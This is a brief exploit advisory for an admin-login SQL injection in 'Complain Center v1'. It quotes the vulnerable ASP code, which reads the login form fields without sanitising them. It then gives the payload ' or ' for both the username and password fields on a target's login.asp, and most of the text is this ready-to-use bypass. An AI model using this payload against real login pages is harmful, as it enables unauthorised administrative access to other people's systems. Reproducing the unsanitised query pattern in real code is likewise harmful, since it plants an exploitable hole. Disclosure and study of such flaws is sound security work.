ENGLISH # Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection # Author : ajann # Exploit; [CODE] loginprocess.asp: .. ... dim varUser dim varPass varUser=Request.Form("TxtUser") No Secure : ) varPass=Request.Form("TxtPass") No Secure : ) .. ... //Before join login page http://[target]/[path]/login.asp Username : ' or ' Password : ' or ' and Login Ok # ajann,Turkey